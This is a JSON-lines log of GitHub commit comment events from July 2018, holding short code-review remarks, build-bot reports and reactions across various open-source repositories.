{"id":"7928765046","type":"CommitCommentEvent","actor":{"login":"nightgryphon"},"repo":{"name":"MarlinFirmware/Marlin"},"payload":{"comment":{"id":29621027,"position":7,"line":165,"path":"Marlin/Conditionals_post.h","commit_id":"e931bc7e7289ff4fc26c7cfd24980c505ba255c9","created_at":"2018-07-06T12:56:01Z","updated_at":"2018-07-06T12:56:01Z","author_association":"NONE","body":"Removing this #define without reworking Marlin_main.cpp is wrong! This removal block the probe deployment code for Z_SAFE_HOMING and Z_AFTER_PROBING "}},"created_at":"2018-07-06T12:56:01Z"}
{"id":"7928766640","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"danterazo/chatarang"},"payload":{"comment":{"id":29621033,"position":null,"line":null,"path":null,"commit_id":"b869389dee61ea54f555bee07567997c5393c7aa","created_at":"2018-07-06T12:56:20Z","updated_at":"2018-07-06T12:56:20Z","author_association":"NONE","body":"👍 Nice job using CSS in JS."}},"created_at":"2018-07-06T12:56:20Z"}
{"id":"7928767554","type":"CommitCommentEvent","actor":{"login":"carolanitz"},"repo":{"name":"Mikanbu/vlc-ios"},"payload":{"comment":{"id":29621037,"position":10,"line":52,"path":"SharedSources/VLCMediaLibraryManager.swift","commit_id":"565d3e1f4b8f6f48a7d3622a968018eee3f1ccf0","created_at":"2018-07-06T12:56:31Z","updated_at":"2018-07-06T12:56:31Z","author_association":"NONE","body":"okay what or where are the callback for when this is done :) or something is discovered?\r\n "}},"created_at":"2018-07-06T12:56:31Z"}
{"id":"7928770324","type":"CommitCommentEvent","actor":{"login":"mleotta"},"repo":{"name":"Kitware/qtextensions"},"payload":{"comment":{"id":29621045,"position":null,"line":null,"path":null,"commit_id":"d26829922047bced3ff1ed945db9d6b2b24b2bbb","created_at":"2018-07-06T12:57:06Z","updated_at":"2018-07-06T12:57:06Z","author_association":"CONTRIBUTOR","body":"@mwoehlke-kitware after this change I get the following CMake error when configuring MAP-Tk:\r\n\r\n```\r\nCMake Error at C:/Users/matt.leotta/Software/fletch/bld-vs15-rel/install/lib/cmake/qtExtensions/UseQtExtensions.cmake:21 (message):\r\n  Qt must be found before using qte_amc_wrap_ui\r\nCall Stack (most recent call first):\r\n  gui/CMakeLists.txt:155 (qte_amc_wrap_ui)\r\n```\r\n\r\nThis while testing the `vtk_opengl2_qt5` branch, but I didn't not have this issue before this change."}},"created_at":"2018-07-06T12:57:06Z"}
{"id":"7928772126","type":"CommitCommentEvent","actor":{"login":"cmdcolin"},"repo":{"name":"GMOD/jbrowse"},"payload":{"comment":{"id":29621052,"position":null,"line":null,"path":null,"commit_id":"ba7c6821db242c9ac4ab6572ff5e52e8189cd518","created_at":"2018-07-06T12:57:28Z","updated_at":"2018-07-06T12:57:28Z","author_association":"CONTRIBUTOR","body":"Maybe I can just run npx webpack -w I suppose for my own workflow"}},"created_at":"2018-07-06T12:57:28Z"}
{"id":"7928772185","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"danterazo/chatarang"},"payload":{"comment":{"id":29621053,"position":null,"line":null,"path":null,"commit_id":"b3d1b4f86cedf0ebdf5b90709bfff88ef1b095a7","created_at":"2018-07-06T12:57:29Z","updated_at":"2018-07-06T12:57:29Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T12:57:29Z"}
{"id":"7928772211","type":"CommitCommentEvent","actor":{"login":"Mikanbu"},"repo":{"name":"Mikanbu/vlc-ios"},"payload":{"comment":{"id":29621054,"position":10,"line":52,"path":"SharedSources/VLCMediaLibraryManager.swift","commit_id":"565d3e1f4b8f6f48a7d3622a968018eee3f1ccf0","created_at":"2018-07-06T12:57:29Z","updated_at":"2018-07-06T12:57:29Z","author_association":"OWNER","body":"below"}},"created_at":"2018-07-06T12:57:29Z"}
{"id":"7928772271","type":"CommitCommentEvent","actor":{"login":"shawnchain"},"repo":{"name":"g4klx/MMDVMHost"},"payload":{"comment":{"id":29621055,"position":5,"line":84,"path":"DMRLookup.cpp","commit_id":"9d6bcb7ec880d8b8a97e4b9383724e57f31948fb","created_at":"2018-07-06T12:57:30Z","updated_at":"2018-07-06T12:57:30Z","author_association":"CONTRIBUTOR","body":"I just raised an issue #438 to discuss the use of CSV format in CALL/ID database file to simplify the Call/ID lookup logic."}},"created_at":"2018-07-06T12:57:30Z"}
{"id":"7928772722","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29621058,"position":null,"line":null,"path":null,"commit_id":"dc88147961e5f0c2302511d5313ce2f9429843cd","created_at":"2018-07-06T12:57:36Z","updated_at":"2018-07-06T12:57:36Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T12:57:36Z"}
{"id":"7928774495","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"danterazo/chatarang"},"payload":{"comment":{"id":29621063,"position":null,"line":null,"path":null,"commit_id":"fafca610ff7428bf776302bf3535a17eda422210","created_at":"2018-07-06T12:57:58Z","updated_at":"2018-07-06T12:57:58Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T12:57:58Z"}
{"id":"7928774976","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"danterazo/chatarang"},"payload":{"comment":{"id":29621065,"position":null,"line":null,"path":null,"commit_id":"48a4c490fdc196ec2517d68b423f11c158ec3629","created_at":"2018-07-06T12:58:05Z","updated_at":"2018-07-06T12:58:05Z","author_association":"NONE","body":"Nice!"}},"created_at":"2018-07-06T12:58:05Z"}
{"id":"7928776500","type":"CommitCommentEvent","actor":{"login":"Mikanbu"},"repo":{"name":"Mikanbu/vlc-ios"},"payload":{"comment":{"id":29621071,"position":10,"line":52,"path":"SharedSources/VLCMediaLibraryManager.swift","commit_id":"565d3e1f4b8f6f48a7d3622a968018eee3f1ccf0","created_at":"2018-07-06T12:58:24Z","updated_at":"2018-07-06T12:58:24Z","author_association":"OWNER","body":"Starting here https://github.com/Mikanbu/vlc-ios/blob/Mikanbu/medialibrary/initial/SharedSources/VLCMediaLibraryManager.swift#L114 "}},"created_at":"2018-07-06T12:58:24Z"}
{"id":"7928778288","type":"CommitCommentEvent","actor":{"login":"EricZimmerman"},"repo":{"name":"SuperJMN/Registry"},"payload":{"comment":{"id":29621076,"position":null,"line":null,"path":null,"commit_id":"cc5805a186dfb559801cdeb7292533c10a644cbd","created_at":"2018-07-06T12:58:46Z","updated_at":"2018-07-06T12:58:46Z","author_association":"NONE","body":"as info, i plan on doing this myself in the master, so once its converted throw a PR and i can get it merged."}},"created_at":"2018-07-06T12:58:46Z"}
{"id":"7928779846","type":"CommitCommentEvent","actor":{"login":"zoffixznet"},"repo":{"name":"perl6/6.d-prep"},"payload":{"comment":{"id":29621078,"position":null,"line":null,"path":null,"commit_id":"d87b37c845cc5563210bd871cf31337c27e6148e","created_at":"2018-07-06T12:59:06Z","updated_at":"2018-07-06T12:59:06Z","author_association":"MEMBER","body":"Some content got accidentally left out from this commit and was committed in https://github.com/perl6/6.d-prep/commit/b937374b1590560cae69db94b1c29163a6d9ab84"}},"created_at":"2018-07-06T12:59:06Z"}
{"id":"7928782406","type":"CommitCommentEvent","actor":{"login":"jiru"},"repo":{"name":"Tatoeba/tatoeba2"},"payload":{"comment":{"id":29621084,"position":13,"line":148,"path":"app/Test/Case/Model/TranslationTest.php","commit_id":"37569043257a4424aa877b3bba32a7b7fcf3aced","created_at":"2018-07-06T12:59:36Z","updated_at":"2018-07-06T12:59:36Z","author_association":"MEMBER","body":"This can be written `$languages = Set::classicExtract($result, '{n}.Translation.lang');` for better readability."}},"created_at":"2018-07-06T12:59:36Z"}
{"id":"7928784079","type":"CommitCommentEvent","actor":{"login":"huyvohcmc"},"repo":{"name":"huyvohcmc/dotfiles"},"payload":{"comment":{"id":29621087,"position":91,"line":134,"path":"init.vim","commit_id":"0d3d653d2d4c29481a6966fb4b51c898d9c9b375","created_at":"2018-07-06T12:59:56Z","updated_at":"2018-07-06T12:59:56Z","author_association":"OWNER","body":"@kutsan How am I suppose to change this line with gina?"}},"created_at":"2018-07-06T12:59:56Z"}
{"id":"7928784509","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29621088,"position":null,"line":null,"path":null,"commit_id":"6c7531ea10c5afa5ef04487def2c5772a1a5d480","created_at":"2018-07-06T13:00:00Z","updated_at":"2018-07-06T13:00:00Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (rraustad) - i386-Windows-7-VisualStudio-14: OK (2933 of 2933 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6c7531ea10c5afa5ef04487def2c5772a1a5d480-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6c7531ea10c5afa5ef04487def2c5772a1a5d480-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-06T13:00:00Z"}
{"id":"7928786457","type":"CommitCommentEvent","actor":{"login":"mkaesemann"},"repo":{"name":"mkaesemann/abapGit"},"payload":{"comment":{"id":29621099,"position":null,"line":null,"path":null,"commit_id":"68e1c30110321d1acb2b3b21047693be03cba9fd","created_at":"2018-07-06T13:00:23Z","updated_at":"2018-07-06T13:00:23Z","author_association":"OWNER","body":"I might do that at some point. At this point I didn't even consider it, because I was already aware that function groups migtht be hard or impossible to add to the distribution.\r\nSo it was only intended as a local modification and improvement.\r\nThat's also why the commit hasn't been cleaned up and is a collection of things I stumbled across while trying out parallelization.\r\nI'm not yet that good at branch handling... 😉 "}},"created_at":"2018-07-06T13:00:23Z"}
{"id":"7928787178","type":"CommitCommentEvent","actor":{"login":"MaximilianMay"},"repo":{"name":"FNTD/Java-library"},"payload":{"comment":{"id":29621103,"position":null,"line":null,"path":null,"commit_id":"a93f66062a64489562a7858dbc1ff1821e24745d","created_at":"2018-07-06T13:00:31Z","updated_at":"2018-07-06T13:00:31Z","author_association":"NONE","body":"(or rather the macro generated by fillBackgroundFile is not bug free, not the function itself)"}},"created_at":"2018-07-06T13:00:31Z"}
{"id":"7928790048","type":"CommitCommentEvent","actor":{"login":"wvdvegt"},"repo":{"name":"peterhaneve/evemon"},"payload":{"comment":{"id":29621112,"position":null,"line":null,"path":null,"commit_id":"8fe601f352f508fde31f5778bc5e883cc0691a52","created_at":"2018-07-06T13:01:04Z","updated_at":"2018-07-06T13:01:04Z","author_association":"NONE","body":"This fix works (put all unreachable assets into one group) but looks very bad and is not very workable with 1.5K items in it and grouped on location. It gives absolutely no clue what ships and content belong together for example."}},"created_at":"2018-07-06T13:01:04Z"}
{"id":"7928790670","type":"CommitCommentEvent","actor":{"login":"jiru"},"repo":{"name":"Tatoeba/tatoeba2"},"payload":{"comment":{"id":29621115,"position":8,"line":143,"path":"app/Test/Case/Model/TranslationTest.php","commit_id":"37569043257a4424aa877b3bba32a7b7fcf3aced","created_at":"2018-07-06T13:01:12Z","updated_at":"2018-07-06T13:01:12Z","author_association":"MEMBER","body":"It’s better to avoid as much as possible this kind of modifications of the tested code. Why is this required?"}},"created_at":"2018-07-06T13:01:12Z"}
{"id":"7928796493","type":"CommitCommentEvent","actor":{"login":"MaheshLamdade"},"repo":{"name":"sadeshbodake/Web-design"},"payload":{"comment":{"id":29621130,"position":95,"line":88,"path":"Assignment2/index.html","commit_id":"0888916b7bed097f43bef41d59df51976f4a16bf","created_at":"2018-07-06T13:02:23Z","updated_at":"2018-07-06T13:02:23Z","author_association":"NONE","body":"No absolute tags"}},"created_at":"2018-07-06T13:02:23Z"}
{"id":"7928799605","type":"CommitCommentEvent","actor":{"login":"kekkokk"},"repo":{"name":"lynckia/licode"},"payload":{"comment":{"id":29621142,"position":null,"line":null,"path":null,"commit_id":"6db9a17073e853d4e31691124f82fe466c976388","created_at":"2018-07-06T13:03:03Z","updated_at":"2018-07-06T13:03:03Z","author_association":"CONTRIBUTOR","body":"Is there a way to fix a start temporal layer? it's annoying to see the other streams glithing at the start of the call. especially if we are simulcasting a 640x480 where the base spatial layer il 320x240 and there's almost no difference in bitrate from the differents temporal layers"}},"created_at":"2018-07-06T13:03:03Z"}
{"id":"7928802035","type":"CommitCommentEvent","actor":{"login":"kzc"},"repo":{"name":"fabiosantoscode/terser"},"payload":{"comment":{"id":29621151,"position":null,"line":null,"path":null,"commit_id":"b495a46f54cb7d4c23efacb175e019e80825f08d","created_at":"2018-07-06T13:03:33Z","updated_at":"2018-07-06T13:03:33Z","author_association":"COLLABORATOR","body":"@fabiosantoscode The fix was already made in https://github.com/fabiosantoscode/terser/commit/5b427290ebde19b6e611187181d968378bfe7be3, but I guess you wanted the test reformatting?\r\n\r\nSide note: Many upstream ES5 fixes are not needed/wanted by Terser as some optimizations were not merged. Although I suppose the tests could be ported to verify they work and committed with a comment to that effect - i.e., \"port upstream tests from bug fix XXX. no code changes\"."}},"created_at":"2018-07-06T13:03:33Z"}
{"id":"7928805046","type":"CommitCommentEvent","actor":{"login":"kutsan"},"repo":{"name":"huyvohcmc/dotfiles"},"payload":{"comment":{"id":29621158,"position":91,"line":134,"path":"init.vim","commit_id":"0d3d653d2d4c29481a6966fb4b51c898d9c9b375","created_at":"2018-07-06T13:04:10Z","updated_at":"2018-07-06T13:04:10Z","author_association":"NONE","body":"You can use `gina#component#repo#branch`."}},"created_at":"2018-07-06T13:04:10Z"}
{"id":"7928805953","type":"CommitCommentEvent","actor":{"login":"88lucas88"},"repo":{"name":"88lucas88/BDII"},"payload":{"comment":{"id":29621159,"position":20,"line":51,"path":"scripts_dw.sql","commit_id":"b04cdad4dc609f5991194057408878321909764b","created_at":"2018-07-06T13:04:21Z","updated_at":"2018-07-06T13:04:21Z","author_association":"OWNER","body":"ADS"}},"created_at":"2018-07-06T13:04:21Z"}
{"id":"7928807932","type":"CommitCommentEvent","actor":{"login":"larshp"},"repo":{"name":"mkaesemann/abapGit"},"payload":{"comment":{"id":29621168,"position":null,"line":null,"path":null,"commit_id":"68e1c30110321d1acb2b3b21047693be03cba9fd","created_at":"2018-07-06T13:04:45Z","updated_at":"2018-07-06T13:04:45Z","author_association":"NONE","body":"We can just leave out the parallel optimization in the distribution, i.e. if the function module does not exist then fallback to single threaded serialization. This would require some changes in abapmerge, but its just work.\r\n\r\nMost interesting is seeing how much you can optimize with parallel serialization"}},"created_at":"2018-07-06T13:04:45Z"}
{"id":"7928809485","type":"CommitCommentEvent","actor":{"login":"MaheshLamdade"},"repo":{"name":"sadeshbodake/Web-design"},"payload":{"comment":{"id":29621173,"position":147,"line":161,"path":"Assignment2/css/style.css","commit_id":"0888916b7bed097f43bef41d59df51976f4a16bf","created_at":"2018-07-06T13:05:05Z","updated_at":"2018-07-06T13:05:05Z","author_association":"NONE","body":"Indentation"}},"created_at":"2018-07-06T13:05:05Z"}
{"id":"7928818267","type":"CommitCommentEvent","actor":{"login":"faronangus"},"repo":{"name":"github/hub"},"payload":{"comment":{"id":29621186,"position":9,"line":17,"path":"README.md","commit_id":"6d8a333a132ffc208173b2be276f64c3ec03eef2","created_at":"2018-07-06T13:06:55Z","updated_at":"2018-07-06T13:06:55Z","author_association":"NONE","body":"use docmentation\r\n\r\n\r\n\r\nthanks"}},"created_at":"2018-07-06T13:06:55Z"}
{"id":"7928822528","type":"CommitCommentEvent","actor":{"login":"hhatto"},"repo":{"name":"woothee/woothee-rust"},"payload":{"comment":{"id":29621197,"position":null,"line":null,"path":null,"commit_id":"a3f71357062a0fa0748d0bdee598a424415b5a8e","created_at":"2018-07-06T13:07:47Z","updated_at":"2018-07-06T13:07:47Z","author_association":"MEMBER","body":"I see it I follow that.\r\n\r\ndelete `b_woothee` and `b_uap` , and rename `b_woothee_reuse` and `b_uap_reuse` to `b_woothee` and `b_uap`.\r\n\r\n\r\n"}},"created_at":"2018-07-06T13:07:47Z"}
{"id":"7928829010","type":"CommitCommentEvent","actor":{"login":"AlessandroMiola"},"repo":{"name":"AlessandroMiola/BitcoinBlockchainTechnology"},"payload":{"comment":{"id":29621214,"position":null,"line":null,"path":null,"commit_id":"0b41380d64b60c9ae48d4cf9a831c013a5374539","created_at":"2018-07-06T13:09:07Z","updated_at":"2018-07-06T13:09:07Z","author_association":"OWNER","body":"- Comments in previous commits can be ignored."}},"created_at":"2018-07-06T13:09:07Z"}
{"id":"7928829512","type":"CommitCommentEvent","actor":{"login":"kutsan"},"repo":{"name":"huyvohcmc/dotfiles"},"payload":{"comment":{"id":29621216,"position":91,"line":134,"path":"init.vim","commit_id":"0d3d653d2d4c29481a6966fb4b51c898d9c9b375","created_at":"2018-07-06T13:09:12Z","updated_at":"2018-07-06T13:09:12Z","author_association":"NONE","body":"By the way @huyvohcmc, it's my opinion that gina is better than fugitive. There is no objective choice here. You should decide yourself whether or not you should use gina. I'm doing better with gina than I did with fugitive but this might not be the case for you. Some people think fugitive is better even though it's bloated. I don't want to waste your time, you should know. I'm here to help."}},"created_at":"2018-07-06T13:09:12Z"}
{"id":"7928830108","type":"CommitCommentEvent","actor":{"login":"kleest"},"repo":{"name":"viaduck/mariadbpp"},"payload":{"comment":{"id":29621220,"position":4,"line":13,"path":"include/mariadb++/types.hpp","commit_id":"7db2285d1c6ffe02f3e2ffa2bfb1f91fa0cf04d5","created_at":"2018-07-06T13:09:19Z","updated_at":"2018-07-06T13:09:19Z","author_association":"MEMBER","body":"Opened new issue #8."}},"created_at":"2018-07-06T13:09:19Z"}
{"id":"7928840583","type":"CommitCommentEvent","actor":{"login":"AndriyKostretskiy"},"repo":{"name":"AndriyKostretskiy/AndriyKostretskiy.github.io"},"payload":{"comment":{"id":29621247,"position":5,"line":3,"path":"README.md","commit_id":"d59ecbfae92db07b4944f6019bfa7536bb5feb17","created_at":"2018-07-06T13:11:24Z","updated_at":"2018-07-06T13:11:24Z","author_association":"OWNER","body":"uuuoioioi"}},"created_at":"2018-07-06T13:11:24Z"}
{"id":"7928842539","type":"CommitCommentEvent","actor":{"login":"dongming33333"},"repo":{"name":"EOSVR/EOSVR"},"payload":{"comment":{"id":29621251,"position":null,"line":null,"path":null,"commit_id":"b624c8aeb4b8b866d73452c7358c0ddbc99ac34a","created_at":"2018-07-06T13:11:46Z","updated_at":"2018-07-06T13:11:46Z","author_association":"NONE","body":"\n        \n            我在EOSVR钱包用自己g开头的12位初始账号进行操作，代币现在显示3.5113EOS，还有15903.7113EVR。然后按照网址https://github.com/EOSVR/EOSVR/blob/master/how-to-offline-cn.md的“输入要转给的帐号，和要转的代币数量，最小值是 0.0001 EOS。发币方默认是 eosio.token，就是 EOS 官方币。如果需要转其他代币，需要修改这一项。比如: EVR代币就是，eosvrtokenss ，数量一栏需要改成 XXX EVR”这个步骤去操作，操作页面显示“接收用户：dongming3333（也是自己的账号），发币方：eosvrtokenss，发送代币数量：10 EVR”，下方显示“You only have 3.5313EOS”。 又比如，我通过https://eospark.com查询到我的初始账号，其中EOSDAC的官方账户eosdactokens向我的初始账号空投了和EVR一样数量的EOSDAC（但是EOSVR钱包里面没显示），我继续按照上面的步骤去操作，操作页面显示“接收用户：dongming3333，发币方：eosdactokens，发送代币数量：10 EOSDAC”，下方同样显示“You only have 3.5313EOS”。 下面是我的问题： 问题1：这个版本的EOSVR钱包是否只能交易EOS吗？如果是，那我就不能交易其他诸如EVR、EOSDAC等代币，那我应该通过什么方式转出我初始账号的其他代币到交易所交易呢？如果否，那我就可以交易其他空投代币，那应该怎样操作去转出进行交易？ 问题2：通过EOSVR钱包输入私钥，按“导入离线账户”。在这个步骤之后，我尝试在其他钱包导入我的私钥，显示“该私钥没有对应账户，无法导入”，意思是以后只能用EOSVR钱包进行操作吗？\n\n\n\n    \n    \n    \n\n\n\n    \n        \n            \n                \n                    \n                        \n                    \n                    \n                        \n                            316253432\n                            \n                            \n                                \n                                    邮箱：316253432@qq.com\n                                \n                        \n                    \n                \n            \n        \n    \n\n\nSignature is customized by Netease Mail Master\n            On 07/06/2018 13:06, wsdfz wrote: 选中要接受空投的帐号，必须是 初始帐号，然后在 交易 里面，点 EVR空投，再点 确定 即可。\n\n—You are receiving this because you commented.Reply to this email directly, view it on GitHub, or mute the thread.\n{\"api_version\":\"1.0\",\"publisher\":{\"api_key\":\"05dde50f1d1a384dd78767c55493e4bb\",\"name\":\"GitHub\"},\"entity\":{\"external_key\":\"github/EOSVR/EOSVR\",\"title\":\"EOSVR/EOSVR\",\"subtitle\":\"GitHub repository\",\"main_image_url\":\"https://assets-cdn.github.com/images/email/message_cards/header.png\",\"avatar_image_url\":\"https://assets-cdn.github.com/images/email/message_cards/avatar.png\",\"action\":{\"name\":\"Open in GitHub\",\"url\":\"https://github.com/EOSVR/EOSVR\"}},\"updates\":{\"snippets\":[{\"icon\":\"PERSON\",\"message\":\"@wsdfz on b624c8a: 选中要接受空投的帐号，必须是 初始帐号，然后在 交易 里面，点 EVR空投，再点 确定 即可。\\r\\n\"}],\"action\":{\"name\":\"View Commit\",\"url\":\"https://github.com/EOSVR/EOSVR/commit/b624c8aeb4b8b866d73452c7358c0ddbc99ac34a#commitcomment-29616596\"}}}\n[\n{\n\"@context\": \"http://schema.org\",\n\"@type\": \"EmailMessage\",\n\"potentialAction\": {\n\"@type\": \"ViewAction\",\n\"target\": \"https://github.com/EOSVR/EOSVR/commit/b624c8aeb4b8b866d73452c7358c0ddbc99ac34a#commitcomment-29616596\",\n\"url\": \"https://github.com/EOSVR/EOSVR/commit/b624c8aeb4b8b866d73452c7358c0ddbc99ac34a#commitcomment-29616596\",\n\"name\": \"View Commit\"\n},\n\"description\": \"View this Commit on GitHub\",\n\"publisher\": {\n\"@type\": \"Organization\",\n\"name\": \"GitHub\",\n\"url\": \"https://github.com\"\n}\n}\n]"}},"created_at":"2018-07-06T13:11:46Z"}
{"id":"7928842760","type":"CommitCommentEvent","actor":{"login":"mkaesemann"},"repo":{"name":"mkaesemann/abapGit"},"payload":{"comment":{"id":29621252,"position":null,"line":null,"path":null,"commit_id":"68e1c30110321d1acb2b3b21047693be03cba9fd","created_at":"2018-07-06T13:11:49Z","updated_at":"2018-07-06T13:11:49Z","author_association":"OWNER","body":"Well right now I am testing it with our add-on repository (>18000 objects) and 12-13 free WPs in the system and was able to get down from 8 minutes to start and show the repository to 2 minutes to start and show the repository. But naturally that is not yet a solid ground to argue on.\r\nBut we'll see how well it fares and how far I might be able to push it. As long as the worst case is not much worse than single threaded serialization, it's a win."}},"created_at":"2018-07-06T13:11:49Z"}
{"id":"7928844772","type":"CommitCommentEvent","actor":{"login":"fabiosantoscode"},"repo":{"name":"fabiosantoscode/terser"},"payload":{"comment":{"id":29621254,"position":null,"line":null,"path":null,"commit_id":"b495a46f54cb7d4c23efacb175e019e80825f08d","created_at":"2018-07-06T13:12:11Z","updated_at":"2018-07-06T13:12:11Z","author_association":"OWNER","body":"Yes, I just wanted the style changes. It's a bit nicer now.\r\n\r\nI agree, merging the tests in should be a plus!"}},"created_at":"2018-07-06T13:12:11Z"}
{"id":"7928847079","type":"CommitCommentEvent","actor":{"login":"azonchegg"},"repo":{"name":"azonchegg/test"},"payload":{"comment":{"id":29621257,"position":null,"line":null,"path":null,"commit_id":"f2d7993b7aa3bebc5211c998897efb8d2ad2d062","created_at":"2018-07-06T13:12:35Z","updated_at":"2018-07-06T13:12:35Z","author_association":"OWNER","body":"Helpful image"}},"created_at":"2018-07-06T13:12:35Z"}
{"id":"7928848120","type":"CommitCommentEvent","actor":{"login":"jiru"},"repo":{"name":"Tatoeba/tatoeba2"},"payload":{"comment":{"id":29621258,"position":18,"line":153,"path":"app/Test/Case/Model/TranslationTest.php","commit_id":"37569043257a4424aa877b3bba32a7b7fcf3aced","created_at":"2018-07-06T13:12:48Z","updated_at":"2018-07-06T13:12:48Z","author_association":"MEMBER","body":"This way of testing works, but it looks like you’re copying the fix over here in order to build `$expected`. The simpler the test, the better, so I’d rather to just set `$expected = array('deu', 'deu', 'fra', 'fra', 'ita');`."}},"created_at":"2018-07-06T13:12:48Z"}
{"id":"7928849269","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"Smith2106/Chatagonia"},"payload":{"comment":{"id":29621262,"position":null,"line":null,"path":null,"commit_id":"ce07b138b15a3dc84b74b04a6d9647ad6fbbbfe3","created_at":"2018-07-06T13:13:02Z","updated_at":"2018-07-06T13:13:02Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T13:13:02Z"}
{"id":"7928850352","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"Smith2106/Chatagonia"},"payload":{"comment":{"id":29621265,"position":null,"line":null,"path":null,"commit_id":"d6c8c066ed82405acb30bc7e2a34208f7fcee84d","created_at":"2018-07-06T13:13:15Z","updated_at":"2018-07-06T13:13:15Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T13:13:15Z"}
{"id":"7928850892","type":"CommitCommentEvent","actor":{"login":"larry126"},"repo":{"name":"EerieCode/Percy-Alpha-Testing"},"payload":{"comment":{"id":29621266,"position":4,"line":3,"path":"SOFU-JP/c101006061.lua","commit_id":"59977a0fc90afe79a122970c65d489f4364085d7","created_at":"2018-07-06T13:13:22Z","updated_at":"2018-07-06T13:13:22Z","author_association":"COLLABORATOR","body":"Hidden truth: Scripted by me"}},"created_at":"2018-07-06T13:13:22Z"}
{"id":"7928852016","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"Smith2106/Chatagonia"},"payload":{"comment":{"id":29621273,"position":null,"line":null,"path":null,"commit_id":"d8eb33fe3877ab5b102311ab0720b14f3ecf90cc","created_at":"2018-07-06T13:13:35Z","updated_at":"2018-07-06T13:13:35Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T13:13:35Z"}
{"id":"7928853498","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"Smith2106/Chatagonia"},"payload":{"comment":{"id":29621278,"position":null,"line":null,"path":null,"commit_id":"c69006022ba97bd3c288abcc34b65c2964df666c","created_at":"2018-07-06T13:13:51Z","updated_at":"2018-07-06T13:13:51Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T13:13:51Z"}
{"id":"7928855292","type":"CommitCommentEvent","actor":{"login":"luoxp183"},"repo":{"name":"crossoverJie/Java-Interview"},"payload":{"comment":{"id":29621286,"position":null,"line":null,"path":null,"commit_id":"c7fc93df8c85f1d6904853cffeddc0c65242ad3f","created_at":"2018-07-06T13:14:14Z","updated_at":"2018-07-06T13:14:14Z","author_association":"NONE","body":"1111"}},"created_at":"2018-07-06T13:14:14Z"}
{"id":"7928856675","type":"CommitCommentEvent","actor":{"login":"luoxp183"},"repo":{"name":"crossoverJie/Java-Interview"},"payload":{"comment":{"id":29621290,"position":2,"line":34,"path":"src/main/java/com/crossoverjie/basic/HashMapTest.java","commit_id":"c7fc93df8c85f1d6904853cffeddc0c65242ad3f","created_at":"2018-07-06T13:14:31Z","updated_at":"2018-07-06T13:14:31Z","author_association":"NONE","body":"啦啦啦"}},"created_at":"2018-07-06T13:14:31Z"}
{"id":"7928858857","type":"CommitCommentEvent","actor":{"login":"marcorm"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29621297,"position":null,"line":null,"path":null,"commit_id":"30044fd531c22c4c5e8f1ede206fa7c2c3fd3aa8","created_at":"2018-07-06T13:14:57Z","updated_at":"2018-07-06T13:14:57Z","author_association":"NONE","body":"It's not been released with 0.56... I'm i right?"}},"created_at":"2018-07-06T13:14:57Z"}
{"id":"7928859109","type":"CommitCommentEvent","actor":{"login":"pmcphilwalsh"},"repo":{"name":"pmcphilwalsh/myweb"},"payload":{"comment":{"id":29621303,"position":null,"line":null,"path":null,"commit_id":"c78311eab81494b4c4d10339628561e1c97792b4","created_at":"2018-07-06T13:15:00Z","updated_at":"2018-07-06T13:15:00Z","author_association":"OWNER","body":"associating this with #3 "}},"created_at":"2018-07-06T13:15:00Z"}
{"id":"7928861066","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"Smith2106/Chatagonia"},"payload":{"comment":{"id":29621309,"position":null,"line":null,"path":null,"commit_id":"354ab161dbc93ee2214659746c33cfcf1d37a802","created_at":"2018-07-06T13:15:24Z","updated_at":"2018-07-06T13:15:24Z","author_association":"NONE","body":"Nice!"}},"created_at":"2018-07-06T13:15:24Z"}
{"id":"7928862554","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"Smith2106/Chatagonia"},"payload":{"comment":{"id":29621313,"position":null,"line":null,"path":null,"commit_id":"5611514b5299a58ffb36fe72ae36fed352836910","created_at":"2018-07-06T13:15:41Z","updated_at":"2018-07-06T13:15:41Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T13:15:41Z"}
